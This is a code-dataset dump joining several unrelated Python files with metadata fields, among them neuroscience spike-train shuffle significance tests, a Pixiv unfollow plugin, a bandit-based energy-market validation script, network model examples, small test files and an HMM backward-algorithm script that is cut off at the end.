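    # shuffle offsets, circularly shifts the spike train by each offset (with a
    # random sign), recomputes the tuning metrics, and puts its two result arrays
    # on the shared queue in a single call, so the parent collects one item per process.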
vec_lengths = []
stability_indices = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
(
vec_length,
stability_index,
) = spike_tools.mean_vec_length_and_stability(
head_angles_all,
spikes_shuffled,
bin_centers,
bin_spacing,
head_angle_sampling,
camera_frames_per_sec,
smooth_width=smooth_width,
threshold=threshold,
)
vec_lengths.append(vec_length)
stability_indices.append(stability_index)
vec_lengths = np.array(vec_lengths)
stability_indices = np.array(stability_indices)
output.put([vec_lengths, stability_indices])
def is_ahv_cell_sig(
pearson_r_neg_real,
pearson_r_pos_real,
bin_centers,
spike_train,
ahv_vals_timecourse,
bin_times_in_range,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
num_iterations=1000,
num_processes=10,
correlation_mag_force=True,
parallel=False,
):
shuffled_binned_data = []
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
)
pearson_r_neg, pearson_r_pos = generic_parallel_shuffle_test(
ahv_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
two_lists=True,
)
else: # if parallel doesn't work
logging.warning("Running serial shuffling")
pearson_r_neg = np.empty(num_iterations)
pearson_r_pos = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
(
(pearson_r_neg[iteration], pearson_r_pos[iteration]),
_shuffled_binned_data,
) = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
pos_neg_separate=True,
)
shuffled_binned_data.append(_shuffled_binned_data)
    # if we only care about the magnitude of the correlation
if correlation_mag_force:
pearson_r_neg = abs(pearson_r_neg)
pearson_r_pos = abs(pearson_r_pos)
pearson_r_neg_real = abs(pearson_r_neg_real)
pearson_r_pos_real = abs(pearson_r_pos_real)
real_percentile_neg = percentileofscore(pearson_r_neg, pearson_r_neg_real)
real_percentile_pos = percentileofscore(pearson_r_pos, pearson_r_pos_real)
return real_percentile_neg, real_percentile_pos, shuffled_binned_data
def ahv_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
):
pearson_r_neg = []
pearson_r_pos = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
(r_neg, r_pos), shuffled_binned_data = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
pos_neg_separate=True,
)
pearson_r_neg.append(r_neg)
pearson_r_pos.append(r_pos)
pearson_r_neg = np.array(pearson_r_neg)
pearson_r_pos = np.array(pearson_r_pos)
output.put([pearson_r_neg, pearson_r_pos])
def is_velocity_cell_sig(
pearson_real,
bin_centers,
spike_train,
velocity_vals_timecourse,
bin_times_in_range,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
num_iterations=1000,
num_processes=10,
parallel=False,
correlation_mag_force=False,
):
shuffled_binned_data = []
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
velocity_vals_timecourse,
bin_times_in_range,
)
pearson = generic_parallel_shuffle_test(
velocity_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
)
else: # if parallel doesn't work
logging.warning("Not running serial shuffling")
pearson = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
(
pearson[iteration],
_shuffled_binned_data,
) = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
velocity_vals_timecourse,
bin_times_in_range,
sanitise_values=True,
)
shuffled_binned_data.append(_shuffled_binned_data)
if correlation_mag_force:
pearson = abs(pearson)
pearson_real = abs(pearson_real)
real_percentile_val = percentileofscore(pearson, pearson_real)
return real_percentile_val, shuffled_binned_data
def velocity_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
vals_timecourse,
bin_times_in_range,
):
pearson = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
r, shuffled_binned_data = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
vals_timecourse,
bin_times_in_range,
sanitise_values=True,
)
pearson.append(r)
pearson = np.array(pearson)
output.put(pearson)
def is_place_cell_sig(
real_peak,
bin_centers,
spike_train,
x,
y,
bin_occupancy,
smoothing=None,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
num_iterations=1000,
num_processes=10,
sanitise_values=True,
min_time_in_spatial_bin=0,
parallel=False,
):
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
bin_centers_x, bin_centers_y = bin_centers
bin_size = bin_centers_x[1] - bin_centers_x[0]
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
bin_size,
x,
y,
bin_occupancy,
smoothing,
sanitise_values,
min_time_in_spatial_bin,
)
peaks = generic_parallel_shuffle_test(
place_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
)
else: # if parallel doesn't work
logging.warning("Not running parallel shuffling")
peaks = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
peaks[iteration] = spike_tools.place_peak_response(
spikes_shuffled,
bin_centers,
bin_size,
x,
y,
sanitise_values=sanitise_values,
min_time_in_spatial_bin=min_time_in_spatial_bin,
smoothing=smoothing,
bin_occupancy=bin_occupancy,
)
real_percentile_val = percentileofscore(peaks, real_peak)
return real_percentile_val
def place_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
bin_size,
x,
y,
bin_occupancy,
smoothing,
sanitise_values,
min_time_in_spatial_bin,
):
peaks = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
peak = spike_tools.place_peak_response(
spikes_shuffled,
bin_centers,
bin_size,
x,
y,
sanitise_values=sanitise_values,
min_time_in_spatial_bin=min_time_in_spatial_bin,
smoothing=smoothing,
bin_occupancy=bin_occupancy,
)
peaks.append(peak)
peaks = np.array(peaks)
output.put(peaks) | en | 0.745765 | # Define an output queue # add output to args # array of shuffle magnitudes to go through # split up the shuffle magnitudes into blocks for each process # Setup a list of processes # Run processes # Exit the completed processes # Get process results from the output queue # Get process results from the output queue :param vec_length_real: "Real" (i.e. unshuffled) mean vector length :param head_angles_all: Head angle at bin (wrapped) :param spike_train: Number of spikes per bin :param head_angle_sampling: Relative occupancy of bins :param camera_frames_per_sec: Calibration :param bin_spacing: In radians :param num_iterations: How many shuffling iterations (default: 1000) :param threshold: Number of spikes per bin for it to be classed as active (default: 1) :param bool parallel: If true, split up the shuffle iterations across multiple CPU cores. :param int num_processes: If 'parallel', how many processes to use. Default: 10 :return: # todo: combine with opendirection.spikes.tools.get_direction_per_spike # if parallel doesn't work # if only care about magnitude of correlation # if parallel doesn't work # if parallel doesn't work | 2.469406 | 2 |
app/plugin/biu/do/unfollow.py | 2chips/PixivBiu | 1 | 6632489 | <reponame>2chips/PixivBiu<gh_stars>1-10
# coding=utf-8
# pylint: disable=relative-beyond-top-level
from ....platform import CMDProcessor
@CMDProcessor.plugin_register("api/biu/do/unfollow")
class doUnFollow(object):
def __init__(self, MOD):
self.MOD = MOD
def pRun(self, cmd):
if self.MOD.biu.apiType != "public":
return {"code": 0, "msg": "only support public api"}
try:
args = self.MOD.args.getArgs(
"unfollow",
[
"userID",
(
"restrict=%s"
% self.MOD.biu.sets["biu"]["common"]["defaultActionType"]
),
],
)
except:
return {"code": 0, "msg": "missing parameters"}
return {
"code": 1,
"msg": {
"way": "do",
"args": args,
"rst": self.unFollow(args["ops"].copy(), args["fun"].copy()),
},
}
def unFollow(self, opsArg, funArg):
self.MOD.args.argsPurer(
funArg, {"userID": "user_ids", "restrict": "publicity"}
)
r = self.MOD.biu.api.me_favorite_users_unfollow(**funArg)
return {"api": "public", "data": r}
| # coding=utf-8
# pylint: disable=relative-beyond-top-level
from ....platform import CMDProcessor
@CMDProcessor.plugin_register("api/biu/do/unfollow")
class doUnFollow(object):
def __init__(self, MOD):
self.MOD = MOD
def pRun(self, cmd):
if self.MOD.biu.apiType != "public":
return {"code": 0, "msg": "only support public api"}
try:
args = self.MOD.args.getArgs(
"unfollow",
[
"userID",
(
"restrict=%s"
% self.MOD.biu.sets["biu"]["common"]["defaultActionType"]
),
],
)
except:
return {"code": 0, "msg": "missing parameters"}
return {
"code": 1,
"msg": {
"way": "do",
"args": args,
"rst": self.unFollow(args["ops"].copy(), args["fun"].copy()),
},
}
def unFollow(self, opsArg, funArg):
self.MOD.args.argsPurer(
funArg, {"userID": "user_ids", "restrict": "publicity"}
)
r = self.MOD.biu.api.me_favorite_users_unfollow(**funArg)
return {"api": "public", "data": r} | en | 0.663243 | # coding=utf-8 # pylint: disable=relative-beyond-top-level | 2.149899 | 2 |
P2P_simulation.py | tabsa/P2P_market_MAD | 0 | 6632490 | <filename>P2P_simulation.py
## RL agent for the Energy P2P market as Multi-Armed Bandit (MAD) problem
# Application of MAD problem to the energy P2P market
# TBA
#%% Import packages
import numpy as np
import pandas as pd
import pickle as pkl
import os
# Import Class and functions
from MAD_env import trading_env, trading_agent
from plot_class import *
#%% Hyperparameters for the validation
## Path of the file with the training loop
wk_dir = os.getcwd() + '/results/' # Get from the 'results/' folder
train_file = 'sim_results_fixed_target_15.pkl' # Replace by other if you want
train_file = os.path.join(wk_dir, train_file)
out_filename = 'sim_results_fixed_target_15_Validation.pkl'
out_filename = os.path.join(wk_dir, out_filename)
#no_steps = policy.shape[1] # per episode
no_steps = 40 # Does not have to match the number of steps used in the training loop; set as desired
no_episodes = 100 # Episodes for validation
training_epi = np.arange(90, 100) # Episode ids used to extract the final optimal policy from the training loop
# Different types of energy_target scenarios:
target_bounds = np.array([5, 35]) # Random (and independent) between episodes
target_sample = np.random.uniform(low=target_bounds[0], high=target_bounds[1], size=no_episodes)
#target_bounds = np.arange(start=5, stop=51, step=5) # Progressive e_target = [5, 50]
#target_sample = np.repeat(target_bounds, 20)
## Output data
agent_list = [] # List with all RL agent
outcome_agent = [] # List of outcome DF per RL agent
# Name of the elements for the outcome_agent DF
df_col_name = ['mean_rd', 'final_step', 'energy_target', 'final_state',
'avg_Q_val', 'std_Q_val', 'mean_regret', 'avg_reg_val', 'std_reg_val']
policy_agent = [] # List of policy solutions (array) per RL agent
policy_distribution = [] # List of estimator Q_val(arm_j) per RL agent
#######################################################################################################################
#%% Main Script
if __name__ == '__main__':
## Load the file with the training loop
data = pkl.load(open(train_file, 'rb')) # Read file
env = data['simulation']['environment'] # Load the same env
env.reset() # Important to Reset before using it again
env.sample_seed = target_sample # Replace the energy target for the Validation phase
## Upload the parameters used on the training loop
no_RL_agents = data['agents']['no'] # Same no and Policy per agent
no_offers = env.no_offers
policy_name = data['agents']['id'] # Upload the same Policies from the training loop
optimal_policy = data['policy_dist'] # Optimal policy per agent, it is on a List
policy_sol_epi = np.zeros((6, no_steps, no_episodes)) # Array to store policy solutions per episode
policy_estimate_dist = np.zeros((no_episodes, no_offers, 3)) # 3 values stored per epi and offer, that is why we have a 3rd dimension
for ag in range(no_RL_agents):
agent = trading_agent(env, target_bounds, policy_name[ag], e_greedy=1) # Call the trading_agent class
print(f'Run the agent {agent.policy_opt} with fixed Q-value(j):') # Print which RL_agent by its policy_opt
e = 0 # episode id
while True:
# Set the optimal policy
agent.Arm_Q_j = optimal_policy[ag][training_epi, :, 0].mean(axis=0) # Q-value of each arm_j
agent.N_arm = optimal_policy[ag][training_epi, :, 1].mean(axis=0) # No of times each arm_j was selected
agent.thom_var = optimal_policy[ag][training_epi, :, 2].mean(axis=0) # Only for Thompson-Sampler (Variance of the Beta Dist)
print(f'Episode {e} - Energy target {target_sample[e]}') # Episode print
env.run(agent, e) # Run environment, as inputs - RL_agent and epi_id
# Store final results in np.arrays
policy_sol_epi[:, :, e] = agent.policy_sol
policy_estimate_dist[e, :, :] = agent.Q_val_final
# Go to the next episode
if e < no_episodes-1: # stopping condition
e += 1
                # Reset the agent before starting the next episode
agent.reset()
else: # Stop the loop
break
# end episodes for agent ag
# Store the outcome parameters:
outcome_agent.append(pd.DataFrame(agent.outcome, columns=df_col_name))
policy_agent.append(policy_sol_epi)
policy_distribution.append(policy_estimate_dist)
# Reset the array for next agent in agent_list:
policy_sol_epi = np.zeros((6, no_steps, no_episodes))
policy_estimate_dist = np.zeros((no_episodes, no_offers, 3))
print('\n')
print(f'Validation phase is done')
## Save simulation results
# Build a dictionary
validation = {} # Results from the validation phase, including the Estimator computed from the Training loop
# Validation info
    validation['training_episodes'] = training_epi  # episode ids from the training loop used to build the estimators
    validation['Arm_Q_j'] = [optimal_policy[i][training_epi, :, 0].mean(axis=0) for i in range(no_RL_agents)]
    validation['N_arm'] = [optimal_policy[i][training_epi, :, 1].mean(axis=0) for i in range(no_RL_agents)]
    validation['Thom_var'] = [optimal_policy[i][training_epi, :, 2].mean(axis=0) for i in range(no_RL_agents)]
    validation['episodes'] = no_episodes
validation['steps'] = no_steps
data['validation'] = validation # Assign the new 'validation' field to the data.dictionary
# Update previous fields of the data dictionary
data['simulation']['target'] = target_sample # Energy_target used for the validation
data['outcome'] = outcome_agent
data['policy_sol'] = policy_agent # Optimal policy per agent and episode
data['policy_dist'] = policy_distribution # Distribution of Q_val per arm_j (partner)
file = open(out_filename, 'wb')
pkl.dump(data, file)
file.close()
| <filename>P2P_simulation.py
## RL agent for the Energy P2P market as Multi-Armed Bandit (MAD) problem
# Application of MAD problem to the energy P2P market
# TBA
#%% Import packages
import numpy as np
import pandas as pd
import pickle as pkl
import os
# Import Class and functions
from MAD_env import trading_env, trading_agent
from plot_class import *
#%% Hyperparameters for the validation
## Path of the file with the training loop
wk_dir = os.getcwd() + '/results/' # Get from the 'results/' folder
train_file = 'sim_results_fixed_target_15.pkl' # Replace by other if you want
train_file = os.path.join(wk_dir, train_file)
out_filename = 'sim_results_fixed_target_15_Validation.pkl'
out_filename = os.path.join(wk_dir, out_filename)
#no_steps = policy.shape[1] # per episode
no_steps = 40 # Does not have to match the number of steps used in the training loop; set as desired
no_episodes = 100 # Episodes for validation
training_epi = np.arange(90, 100) # Episode ids used to extract the final optimal policy from the training loop
# Different types of energy_target scenarios:
target_bounds = np.array([5, 35]) # Random (and independent) between episodes
target_sample = np.random.uniform(low=target_bounds[0], high=target_bounds[1], size=no_episodes)
#target_bounds = np.arange(start=5, stop=51, step=5) # Progressive e_target = [5, 50]
#target_sample = np.repeat(target_bounds, 20)
## Output data
agent_list = [] # List with all RL agent
outcome_agent = [] # List of outcome DF per RL agent
# Name of the elements for the outcome_agent DF
df_col_name = ['mean_rd', 'final_step', 'energy_target', 'final_state',
'avg_Q_val', 'std_Q_val', 'mean_regret', 'avg_reg_val', 'std_reg_val']
policy_agent = [] # List of policy solutions (array) per RL agent
policy_distribution = [] # List of estimator Q_val(arm_j) per RL agent
#######################################################################################################################
#%% Main Script
if __name__ == '__main__':
## Load the file with the training loop
data = pkl.load(open(train_file, 'rb')) # Read file
env = data['simulation']['environment'] # Load the same env
env.reset() # Important to Reset before using it again
env.sample_seed = target_sample # Replace the energy target for the Validation phase
## Upload the parameters used on the training loop
no_RL_agents = data['agents']['no'] # Same no and Policy per agent
no_offers = env.no_offers
policy_name = data['agents']['id'] # Upload the same Policies from the training loop
optimal_policy = data['policy_dist'] # Optimal policy per agent, it is on a List
policy_sol_epi = np.zeros((6, no_steps, no_episodes)) # Array to store policy solutions per episode
policy_estimate_dist = np.zeros((no_episodes, no_offers, 3)) # 3 values stored per epi and offer, that is why we have a 3rd dimension
for ag in range(no_RL_agents):
agent = trading_agent(env, target_bounds, policy_name[ag], e_greedy=1) # Call the trading_agent class
print(f'Run the agent {agent.policy_opt} with fixed Q-value(j):') # Print which RL_agent by its policy_opt
e = 0 # episode id
while True:
# Set the optimal policy
agent.Arm_Q_j = optimal_policy[ag][training_epi, :, 0].mean(axis=0) # Q-value of each arm_j
agent.N_arm = optimal_policy[ag][training_epi, :, 1].mean(axis=0) # No of times each arm_j was selected
agent.thom_var = optimal_policy[ag][training_epi, :, 2].mean(axis=0) # Only for Thompson-Sampler (Variance of the Beta Dist)
print(f'Episode {e} - Energy target {target_sample[e]}') # Episode print
env.run(agent, e) # Run environment, as inputs - RL_agent and epi_id
# Store final results in np.arrays
policy_sol_epi[:, :, e] = agent.policy_sol
policy_estimate_dist[e, :, :] = agent.Q_val_final
# Go to the next episode
if e < no_episodes-1: # stopping condition
e += 1
                # Reset the agent before starting the next episode
agent.reset()
else: # Stop the loop
break
# end episodes for agent ag
# Store the outcome parameters:
outcome_agent.append(pd.DataFrame(agent.outcome, columns=df_col_name))
policy_agent.append(policy_sol_epi)
policy_distribution.append(policy_estimate_dist)
# Reset the array for next agent in agent_list:
policy_sol_epi = np.zeros((6, no_steps, no_episodes))
policy_estimate_dist = np.zeros((no_episodes, no_offers, 3))
print('\n')
print(f'Validation phase is done')
## Save simulation results
# Build a dictionary
validation = {} # Results from the validation phase, including the Estimator computed from the Training loop
# Validation info
    validation['training_episodes'] = training_epi  # episode ids from the training loop used to build the estimators
    validation['Arm_Q_j'] = [optimal_policy[i][training_epi, :, 0].mean(axis=0) for i in range(no_RL_agents)]
    validation['N_arm'] = [optimal_policy[i][training_epi, :, 1].mean(axis=0) for i in range(no_RL_agents)]
    validation['Thom_var'] = [optimal_policy[i][training_epi, :, 2].mean(axis=0) for i in range(no_RL_agents)]
    validation['episodes'] = no_episodes
validation['steps'] = no_steps
data['validation'] = validation # Assign the new 'validation' field to the data.dictionary
# Update previous fields of the data dictionary
data['simulation']['target'] = target_sample # Energy_target used for the validation
data['outcome'] = outcome_agent
data['policy_sol'] = policy_agent # Optimal policy per agent and episode
data['policy_dist'] = policy_distribution # Distribution of Q_val per arm_j (partner)
file = open(out_filename, 'wb')
pkl.dump(data, file)
file.close()
| en | 0.767428 | ## RL agent for the Energy P2P market as Multi-Armed Bandit (MAD) problem # Application of MAD problem to the energy P2P market # TBA #%% Import packages # Import Class and functions #%% Hyperparameters for the validation ## Path of the file with the training loop # Get from the 'results/' folder # Replace by other if you want #no_steps = policy.shape[1] # per episode # It can be the same or not from the training loop...up to the user # Episodes for validation # episodes id to get the final optimal policy from the training loop # Different types of energy_target scenarios: # Random (and independent) between episodes #target_bounds = np.arange(start=5, stop=51, step=5) # Progressive e_target = [5, 50] #target_sample = np.repeat(target_bounds, 20) ## Output data # List with all RL agent # List of outcome DF per RL agent # Name of the elements for the outcome_agent DF # List of policy solutions (array) per RL agent # List of estimator Q_val(arm_j) per RL agent ####################################################################################################################### #%% Main Script ## Load the file with the training loop # Read file # Load the same env # Important to Reset before using it again # Replace the energy target for the Validation phase ## Upload the parameters used on the training loop # Same no and Policy per agent # Upload the same Policies from the training loop # Optimal policy per agent, it is on a List # Array to store policy solutions per episode # 3 values stored per epi and offer, that is why we have a 3rd dimension # Call the trading_agent class # Print which RL_agent by its policy_opt # episode id # Set the optimal policy # Q-value of each arm_j # No of times each arm_j was selected # Only for Thompson-Sampler (Variance of the Beta Dist) # Episode print # Run environment, as inputs - RL_agent and epi_id # Store final results in np.arrays # Go to the next episode # stopping condition # Reset of both agent and environment # Stop the loop # end episodes for agent ag # Store the outcome parameters: # Reset the array for next agent in agent_list: ## Save simulation results # Build a dictionary # Results from the validation phase, including the Estimator computed from the Training loop # Validation info # Assign the new 'validation' field to the data.dictionary # Update previous fields of the data dictionary # Energy_target used for the validation # Optimal policy per agent and episode # Distribution of Q_val per arm_j (partner) | 2.592681 | 3 |
examples/lsp_manual_metric_perf_model_prototype.py | tim-fiola/network_traffic_modeler_py3 | 102 | 6632491 | <reponame>tim-fiola/network_traffic_modeler_py3
import sys
sys.path.append("../")
from pprint import pprint
from pyNTM import PerformanceModel
from pyNTM import RSVP_LSP
model = PerformanceModel.load_model_file("perf_model_lsp_metric.csv")
model.update_simulation()
lsp_a_d_1 = model.get_rsvp_lsp("A", "D", "lsp_a_d_1")
lsp_a_d_2 = model.get_rsvp_lsp("A", "D", "lsp_a_d_2")
print("lsp_a_d_2 config_setup_bw = {}".format(lsp_a_d_2.configured_setup_bandwidth))
print("lsp_a_d_2 setup_bw = {}".format(lsp_a_d_2.setup_bandwidth))
print("lsp_a_d_2 manual_metric = {}".format(lsp_a_d_2.manual_metric))
print("lsp_a_d_2 path = ")
pprint(lsp_a_d_2.path)
print()
print("lsp_a_d_1 setup_bw = {}".format(lsp_a_d_1.configured_setup_bandwidth))
print("lsp_a_d_1 manual_metric = {}".format(lsp_a_d_1.manual_metric))
print("lsp_a_d_1 effective_metric = {}".format(lsp_a_d_1.effective_metric(model)))
print("lsp_a_d_1 topology_metric = {}".format(lsp_a_d_1.topology_metric(model)))
new_lsp = RSVP_LSP(
model.get_node_object("A"),
model.get_node_object("G"),
"lsp_a_f_manual_enter",
configured_setup_bandwidth=float("4"),
configured_manual_metric=float("10"),
)
| import sys
sys.path.append("../")
from pprint import pprint
from pyNTM import PerformanceModel
from pyNTM import RSVP_LSP
model = PerformanceModel.load_model_file("perf_model_lsp_metric.csv")
model.update_simulation()
lsp_a_d_1 = model.get_rsvp_lsp("A", "D", "lsp_a_d_1")
lsp_a_d_2 = model.get_rsvp_lsp("A", "D", "lsp_a_d_2")
print("lsp_a_d_2 config_setup_bw = {}".format(lsp_a_d_2.configured_setup_bandwidth))
print("lsp_a_d_2 setup_bw = {}".format(lsp_a_d_2.setup_bandwidth))
print("lsp_a_d_2 manual_metric = {}".format(lsp_a_d_2.manual_metric))
print("lsp_a_d_2 path = ")
pprint(lsp_a_d_2.path)
print()
print("lsp_a_d_1 setup_bw = {}".format(lsp_a_d_1.configured_setup_bandwidth))
print("lsp_a_d_1 manual_metric = {}".format(lsp_a_d_1.manual_metric))
print("lsp_a_d_1 effective_metric = {}".format(lsp_a_d_1.effective_metric(model)))
print("lsp_a_d_1 topology_metric = {}".format(lsp_a_d_1.topology_metric(model)))
new_lsp = RSVP_LSP(
model.get_node_object("A"),
model.get_node_object("G"),
"lsp_a_f_manual_enter",
configured_setup_bandwidth=float("4"),
configured_manual_metric=float("10"),
) | none | 1 | 2.210426 | 2 |
|
pytype/tools/xref/testdata/classdef_in_function.py | Jrryy/pytype | 3,882 | 6632492 | <reponame>Jrryy/pytype
# pylint: skip-file
def f():
#- @A defines/binding ClassA
#- ClassA.node/kind class
class A:
pass
def g():
#- @B defines/binding ClassB
#- ClassB.node/kind class
class B:
pass
return B
def h(base):
#- @C defines/binding ClassC
#- ClassC.node/kind class
class C(base):
pass
#- @D defines/binding ClassD
#- ClassD.node/kind class
class D(C):
pass
return D()
| # pylint: skip-file
def f():
#- @A defines/binding ClassA
#- ClassA.node/kind class
class A:
pass
def g():
#- @B defines/binding ClassB
#- ClassB.node/kind class
class B:
pass
return B
def h(base):
#- @C defines/binding ClassC
#- ClassC.node/kind class
class C(base):
pass
#- @D defines/binding ClassD
#- ClassD.node/kind class
class D(C):
pass
return D() | en | 0.145511 | # pylint: skip-file #- @A defines/binding ClassA #- ClassA.node/kind class #- @B defines/binding ClassB #- ClassB.node/kind class #- @C defines/binding ClassC #- ClassC.node/kind class #- @D defines/binding ClassD #- ClassD.node/kind class | 2.295242 | 2 |
osp/test/citations/jstor_record/test_pagination.py | davidmcclure/open-syllabus-project | 220 | 6632493 |
import pytest
from osp.citations.jstor_record import JSTOR_Record
@pytest.mark.parametrize('fpage,lpage,pagination', [
# Both.
(100, 200, '100-200'),
# Just fpage.
(100, '', '100'),
# Just lpage.
('', 200, '200'),
# Neither.
('', '', None),
])
def test_pagination(fpage, lpage, pagination, mock_jstor):
path = mock_jstor.add_article(fpage=fpage, lpage=lpage)
assert JSTOR_Record(path).pagination == pagination
|
import pytest
from osp.citations.jstor_record import JSTOR_Record
@pytest.mark.parametrize('fpage,lpage,pagination', [
# Both.
(100, 200, '100-200'),
# Just fpage.
(100, '', '100'),
# Just lpage.
('', 200, '200'),
# Neither.
('', '', None),
])
def test_pagination(fpage, lpage, pagination, mock_jstor):
path = mock_jstor.add_article(fpage=fpage, lpage=lpage)
assert JSTOR_Record(path).pagination == pagination
| en | 0.690724 | # Both. # Just fpage. # Just lpage. # Neither. | 2.320287 | 2 |
bio-info/bioinfo_7.py | kyamada101/Python | 0 | 6632494 | <reponame>kyamada101/Python
import numpy as np
import math
from scipy.special import logsumexp
log05 = np.log(0.5)
x_str = "315116246446644245311321631164152133625144543631656626566666651166453132651245636664631636663162326455236266666625151631222555441666566563564324364131513465146353411126414626253356366163666466232534413661661163252562462255265252266435353336233121625364414432335163243633665562466662632666612355245242"
x = np.array(list(x_str),dtype = np.float32)
# l: state index, b: observed symbol x
def e(l,b):
if l == 0.0:
return 1/6
elif l == 1.0 and b == 6.0:
return 1/2
elif l == 1.0 and b != 6.0:
return 1/10
# k and l: state indices
def a(k,l):
if k == 0.0 and l == 0.0:
return 0.95
elif k == 0.0 and l == 1.0:
return 0.05
elif k == 1.0 and l == 0.0:
return 0.1
elif k == 1.0 and l == 1.0:
return 0.9
# l: state index, b: observed symbol x
def le(l,b):
if l == 0.0:
return np.log(1/6)
elif l == 1.0 and b == 6.0:
return np.log(1/2)
elif l == 1.0 and b != 6.0:
return np.log(1/10)
# k and l: state indices
def la(k,l):
if k == 0.0 and l == 0.0:
return np.log(0.95)
elif k == 0.0 and l == 1.0:
return np.log(0.05)
elif k == 1.0 and l == 0.0:
return np.log(0.1)
    elif k == 1.0 and l == 1.0:
return np.log(0.9)
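# Backward algorithm in log space for the two-state HMM (state 0: fair die, state 1: loaded die);
# b[k, j] is the log backward variable and the final logsumexp gives log P(x).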
def Back_Log(x):
x = np.insert(x,0,0)
n = x.shape[0]
b = np.zeros([2,n])
b[0,n-1] = np.log(1)
b[1,n-1] = np.log(1)
for i in range(1,n-1):
j = (n-1)-i
for k in range(0,2):
b[k,j] = logsumexp([la(k,0) + le(0,x[j+1]) + b[0,j+1], la(k,1) + le(1,x[j+1]) + b[1,j+1]])
lp = logsumexp([log05 + le(0,x[1]) + b[0,1], log05 + le(1,x[1]) + b[1,1]])
return np.exp(lp)
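# Same backward recursion, but with per-position scaling factors s[j] to avoid underflow;
# P(x) is recovered as the product of the scaling factors.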
def Back_Scale(x):
x = np.insert(x,0,0)
n = x.shape[0]
b = np.zeros([2,n])
s = np.zeros(n)
b[0,n-1] = 1
b[1,n-1] = 1
for i in range(1,n):
j = (n-1)-i
if j == 0:
s[j+1] = 0.5*e(0,x[j+1])*b[0,j+1] + 0.5*e(1,x[j+1])*b[1,j+1]
else:
s[j+1] = (a(0,0)+a(1,0))*e(0,x[j+1])*b[0,j+1] + (a(0,1)+a(1,1))*e(1,x[j+1])*b[1,j+1]
for k in range(0,2):
b[k,j] = (1/s[j+1]) * (a(k,0)*e(0,x[j+1])*b[0,j+1] + a(k,1) * e(1,x[j+1])*b[1,j+1])
return np.prod(s[1:])
print("Back_Log_result:{}".format(Back_Log(x)))
print("Back_Scale_result:{}".format(Back_Scale(x))) | import numpy as np
import math
from scipy.special import logsumexp
log05 = np.log(0.5)
x_str = "315116246446644245311321631164152133625144543631656626566666651166453132651245636664631636663162326455236266666625151631222555441666566563564324364131513465146353411126414626253356366163666466232534413661661163252562462255265252266435353336233121625364414432335163243633665562466662632666612355245242"
x = np.array(list(x_str),dtype = np.float32)
# l: state index, b: observed symbol x
def e(l,b):
if l == 0.0:
return 1/6
elif l == 1.0 and b == 6.0:
return 1/2
elif l == 1.0 and b != 6.0:
return 1/10
# k and l: state indices
def a(k,l):
if k == 0.0 and l == 0.0:
return 0.95
elif k == 0.0 and l == 1.0:
return 0.05
elif k == 1.0 and l == 0.0:
return 0.1
elif k == 1.0 and l == 1.0:
return 0.9
# l: state index, b: observed symbol x
def le(l,b):
if l == 0.0:
return np.log(1/6)
elif l == 1.0 and b == 6.0:
